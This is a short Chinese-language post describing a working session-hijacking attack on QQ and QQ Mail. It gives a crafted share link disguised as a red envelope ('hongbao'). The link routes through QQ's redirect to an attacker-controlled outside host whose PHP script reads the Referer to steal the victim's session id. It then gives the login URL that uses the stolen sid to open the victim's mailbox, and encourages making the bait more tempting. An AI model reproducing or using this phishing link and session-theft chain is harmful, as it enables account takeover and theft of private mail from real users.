我是如何发一个“红包”就控制别人的QQ的(以QQ邮箱作为演示/无需xss)
 

https://connect.qq.com/widget/shareqq/index.html?url=https://jump.qt.qq.com/php/jump/check_url/?url=https://jieshousid.com/f.php&desc=&title=&summary=&pics=https://mqq-imgcache.gtimg.cn/res/mqq/hongbao/img/message_logo_100.png&flash=&site=&style=201&width=32&height=32



这个可以自行构造更具诱惑的链接

如:
 

KTMZ$6W[P($I]4}AHV$T~UL.jpg





脚本f.php
 

$_SERVER['HTTP_REFERER'];

获取Referer
 

EABDDD1F-9E8E-474E-8731-5017E117DC5B.png





得到sid 构造如下链接即可进入qq邮箱:

https://w.mail.qq.com/cgi-bin/login?3g_sid=获取到的sid&3g_style=1&fun=from3g


 

EA403B49-3FC4-40FC-A153-E33EDF8DDBAF.png